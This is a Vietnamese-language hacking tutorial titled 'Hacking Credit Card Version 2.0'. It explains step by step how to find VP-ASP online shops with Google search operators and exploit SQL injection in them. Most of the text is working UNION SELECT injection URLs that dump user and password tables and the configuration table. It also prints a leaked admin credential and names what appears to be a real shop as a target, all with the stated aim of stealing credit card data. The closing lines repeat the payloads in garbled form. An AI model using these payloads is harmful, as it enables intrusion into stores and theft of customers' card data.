HackingCreditCardVersion2.0 --- WrittenbyHieupc shopdisplayproducts.asp? cat=' Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack creditcard mới và có lẽ đây là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả lời những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hackingcredit card. Nào giờ chúng ta bắt ðầu bắt ðầu nhé. Cách này cũng nhý những cách thông thường là khai thác theo lỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như: OLE DB, JET Database, ASP… Býớc 1: Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good. Từ khoá nên dùng: allinurl:”shopdisplayproducts.asp?id= hoặc allinurl:”shopdisplayproducts.asp?cat=1 hoặc allinurl:”shopdisplayproducts.asp?cat=2…… Search shop theo Domain .com, .net , .biz… : allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat= . Ai biết chấm gì nữa thì thay vào :) Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn. Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack. Býớc 2: Ví dụ: lấy ví dụ là 1 site thế có dạng thế này : http://www.victim.com http://www.victim.com/shopdisplayproducts.asp?id=5 Ta sẽ thêm dấu phẩy ( ` ) vào sau số 5: http://www.victim.com/shopdisplayproducts.asp?id=5' Xem nó có bị lỗi không nào, hic nó không bị lỗi, chỉ thấy thế này: Home Improvement Page 1 of 2 Không sao, chúng ta hãy bình tĩnh nhé, thay “ id “ bằng “ cat “ thử xem: http://www.victim.com/shopdisplayproducts.asp?id=5' -->>> http://www.victim.com/shopdisplayproducts.asp?cat=5' Uh, nó lỗi ruì kìa: 5' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c. catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467 Okie, tiếp tục nhé, bạn sẽ thêm ðoạn code sau ðây vào: '%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5' Khi thêm xong thì sẽ nhý thế này: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201%20from%20tbluser"having% 201=1--sp_password và ðýợc thế? này : 5' union select 1 from tbluser"having 1=1--sp_password Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 467 Chú ý nhé các bạn, cái dấu phẩy ( ` ) rất quan trọng, không có là không được. Và cứ thế ta cứ tiếp tục thêm số nhé: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2%20from%20tbluser"having% 201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3%20from%20tbluser"having %201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3,4%20from% 20tbluser"having%201=1--sp_password Cứ thế mà tiếp tục cho ðến khi bạn thấy 1 cái bảng đẹp đẹp hiện ra với vài con số. Ở ðây là tới số 47 : http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1--sp_password 3 click to see more 4 22 18 Please review these other products: Nào giờ chúng ta bắt đầu lấy user and pass: · fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn · fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn Sau khi thêm xong ta sẽ được nhý thế này: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1--sp_password Và có được username và password : User: stephenrossi pass: gnilsur Hoặc bạn có thể gộp chung fldusername và fldpassword vào 1 số cũng được. http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername%2b'/'% 2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password Ta sẽ có user và pass được gộp chung 1 số: stephenrossi/gnilsur Bước 3: Tìm link admin, thử đánh cái này vào được không nào: http://www.victim.com/shopadmin.asp hic không được rồi. Thử cái này nữa thử xem, may ra nó chạy đến link admin thì sao: http://www.victim.com/shopadmin1.asp , cũng không được. Cái này hieupc đã download cái source của VPASP về xem cấu trúc nó thế nào, và đã tìm ra cậu lệnh thế này, chẳng qua là thay table thôi. Ta biết table configuration là nơi chứa những thông quan trọng của shop như là link admin, afftemplateaffiliate, afftemplateMerchant… Vậy cậu lệnh sẽ thế này: '%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Thay vào ta sẽ được: http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Ta cũng thấy cái bảng: 3 click to see more 4 22 18 Please review these other products: Lần này thì ta sẽ kiếm link admin, thường thì link admin nằm trong fieldvalue , vì thế ta sẽ đặt fieldvalue vào số 3, hay 4, hay 22 tuỳ các bạn. '%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Sau khi thêm xong ta sẽ được thế này: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh, nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang. Page 1 of 10 Chỉ cần để ý là các bạn thấy thôi, nói thêm là: mỗi một trang như vậy là chứa những thông tin có trong fieldvalue , các bạn cứ cố gắng view từng trang nhé, hieupc view hết 10 trang và thu thập được những link có đuôi là *.asp: shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp Nhất định 1 trong 3 link này là link admin login , hieupc đã thử hết 3 link và cái link đầu tiên là link admin shopaddmoretocart.asp http://www.victim.com/shopaddmoretocart.asp This site is reserved for Shop Administrators only. Administrator's Login UserName : Password : Bây giờ lấy username và password ở trên để thay vào. Việc còn lại chắc các bạn biết. THE END Image Field . http://www.victim.com/shopdisplayproducts.asp?cat=' % 20 union % 20 % 20 select % 20 1 ,2, 3,fldusername%2b'/'% 2bfldpassword,5,6,7,8,9, 10, 11, 12, 13,14,15,16,17,18,19 , 20 ,21 ,22 ,23 ,24 ,25 ,26 ,27 ,28 ,29 , 30, 31, 32, 33,34,35,36,37,38,39,. ' % 20 union % 20 % 20 select% 20 1 ,2, 3,4,5,6,7,8,9, 10, 11, 12, 13,14,15,16,17,18,19 , 20 ,21 ,22 ,23 ,24 ,25 ,26 ,27 ,28 ,29 , 30, 31, 32, 33,34,35,36,37,38,39, 40, 41, 42, 43,44,45,46,47 % 20 from % 20 configuration"having % 20 1= 1-- sp_password